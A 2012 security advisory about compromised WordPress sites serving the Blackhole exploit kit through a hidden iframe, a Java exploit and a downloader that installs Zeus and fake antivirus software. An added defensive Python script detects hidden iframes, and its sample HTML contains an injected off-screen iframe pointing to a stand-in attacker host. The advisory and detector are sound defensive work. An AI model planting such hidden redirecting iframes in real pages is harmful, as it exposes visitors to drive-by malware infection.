Compromised WordPress sites use Black-Hole Exploit for Drive-by Infection

February 3, 2012

SonicWALL UTM research team has received reports of a new mass compromise of WordPress websites leading to drive-by malware download using the Black Hole Exploit kit. The malware spreads simply by visiting an infected page on a compromised WordPress based web server. The Blackhole exploit kit is known for targeting a list of known vulnerabilities on the target system, and when successful it often downloads and runs a malicious executable. The exploits we observed here target Java based vulnerabilities. If the visiting system is unpatched and the exploit succeeds, a malicious executable is downloaded without user consent.

The compromised sites contain the malicious Black Hole Exploit script as seen below:

[Detected as GAV: ScrInject.WP (Trojan)]

The script is dynamic and contains different content upon each visit to the infected site. During analysis, we found that the script contained a hidden iframe that leads to a Black Hole Exploit kit site targeting Java based vulnerabilities and serving the file df190f61.jar [Detected as GAV: JVExp.A (Trojan)].
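As an added illustration (not code from the SonicWALL advisory), the following Python script scans a served page for iframes that are hidden in the ways injected redirectors typically are, the kind of check a site owner can run over their own WordPress output; the sample HTML and the `attacker.example` host are constructed for the example.

```python
# Added example, not from the advisory: flag hidden <iframe> tags in a page,
# since injected exploit-kit redirectors are usually made invisible.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

class HiddenIframeFinder(HTMLParser):
    """Collect <iframe> tags whose attributes suggest they are meant to be invisible."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        for dim in ("width", "height"):           # 0/1 pixel frames
            if a.get(dim, "").strip().rstrip("px") in ("0", "1"):
                reasons.append(f"{dim}={a[dim]}")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("style hides frame")
        if re.search(r"(left|top):-\d{3,}", style):   # pushed far off-screen
            reasons.append("positioned off-screen")
        if reasons:
            self.findings.append({"src": a.get("src", ""), "reasons": reasons})

def find_hidden_iframes(html, site_host):
    """Return hidden iframes found in html; mark those pointing at a foreign host."""
    p = HiddenIframeFinder()
    p.feed(html)
    for f in p.findings:
        host = urlparse(f["src"]).hostname or site_host   # relative src = same host
        f["foreign_host"] = host != site_host
    return p.findings

# Constructed sample: a benign embed plus one injected, hidden, off-site iframe.
SAMPLE_HTML = """<html><body><h1>Blog</h1>
<iframe src="https://www.youtube.com/embed/x" width="560" height="315"></iframe>
<iframe src="http://attacker.example/landing.php" width="1" height="1"
        style="visibility: hidden; position:absolute; left:-9999px"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE_HTML, "blog.example"):
        print(finding)
```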

The jar file is executed and causes the downloader Trojan setup.exe to be downloaded and executed. [Detected as GAV: Downloader.EWP (Trojan)]

The downloader Trojan can download any malware the attacker chooses. We observed both Zeus Trojan and XP Internet Security 2012 FakeAV being served to the infected machine.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: ScrInject.WP (Trojan) current hit count: 5714
  • GAV: JVExp.A (Trojan)
  • GAV: Downloader.EWP (Trojan)